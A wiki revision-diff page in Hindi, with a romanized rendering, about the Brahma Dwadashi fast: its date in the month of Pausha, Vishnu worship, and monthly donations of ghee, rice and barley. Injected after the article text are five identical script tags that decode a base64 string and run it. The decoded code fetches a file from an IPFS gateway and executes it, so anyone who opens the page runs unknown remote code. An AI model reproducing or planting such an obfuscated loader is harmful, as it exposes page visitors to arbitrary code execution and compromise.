Difference between revisions of "ब्रह्म द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*यह व्रत [[पौष]] [[शुक्ल पक्ष|शुक्ल]] [[द्वादशी]] से जब कि [[ज्येष्ठ नक्षत्र]] होता है, किया जाता है।  
 
*यह व्रत [[पौष]] [[शुक्ल पक्ष|शुक्ल]] [[द्वादशी]] से जब कि [[ज्येष्ठ नक्षत्र]] होता है, किया जाता है।  
 
*तिथि; [[देवता]] [[विष्णु]] का पूजन किया जाता है।  
 
*तिथि; [[देवता]] [[विष्णु]] का पूजन किया जाता है।  
 
*एक [[वर्ष]] तक प्रत्येक [[मास]] में विष्णु पूजा और उस दिन उपवास करना चाहिए।  
 
*एक [[वर्ष]] तक प्रत्येक [[मास]] में विष्णु पूजा और उस दिन उपवास करना चाहिए।  
*प्रत्येक [[मास]] में विभिन्न वस्तुओं का दान, यथा–घी, चावल एवं जौ का करना चाहिए <ref>विष्णुधर्मात्तपुराण से उद्धरण (3|220|1-6)</ref>
+
*प्रत्येक [[मास]] में विभिन्न वस्तुओं का दान, यथा–घी, चावल एवं जौ का करना चाहिए।<ref>विष्णुधर्मात्तपुराण से उद्धरण (3|220|1-6</ref>
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:47, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat paush shukl dvadashi se jab ki jyeshth nakshatr hota hai, kiya jata hai.
  • tithi; devata vishnu ka poojan kiya jata hai.
  • ek varsh tak pratyek mas mean vishnu pooja aur us din upavas karana chahie.
  • pratyek mas mean vibhinn vastuoan ka dan, yatha–ghi, chaval evan jau ka karana chahie.[1]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vishnudharmattapuran se uddharan (3|220|1-6

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>